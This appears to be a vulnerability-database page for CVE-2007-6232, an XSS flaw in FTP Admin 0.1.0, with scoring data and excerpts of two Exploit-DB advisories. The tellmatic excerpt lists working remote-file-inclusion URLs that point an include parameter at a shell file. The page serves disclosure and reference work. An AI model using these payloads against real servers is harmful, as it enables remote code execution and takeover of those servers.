CVE-2007-6232
published 2007-12-04
Priority: P4 16, medium, 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.55% (72.1th percentile)
Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter in an error page action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ftp | admin | — | — |
No detection rules found.
Exploit-DB
tellmatic 1.0.7 - Multiple Remote File Inclusions
exploitdb·2007-12-01
CVE-2007-6232 tellmatic 1.0.7 - Multiple Remote File Inclusions
---
~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~
Author : ShAy6oOoN
Group : PitBull Crew
Script : tellmatic 1.0.7
Download : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
Vulnerability Type : Remote File Inclusion
Method : get
Register_globals : On
Exploit URL's :
http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tell
Exploit-DB
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
exploitdb·2007-11-29
CVE-2007-6234 ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
---
FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES
by Omni
1) Infos
Date : 2007-11-28
Product : FTP Admin
Version : v0.1.0
Vendor : http://sourceforge.net/projects/ftpadmin/
Vendor Status : 2007-11-30 Informed!
Description : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin
requires sudo. Features include modification of users and generation of user passwords.
Source : omnipresent - omni
E-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net
Team : Playhack.net Security
2) Security Issues
--- [ XSS ] ---
I think it is better to let you see a PoC instead of explaining where the bug is. If you want to know it, just look at the
source cod
No writeups or analysis indexed.
2007-12-04: Published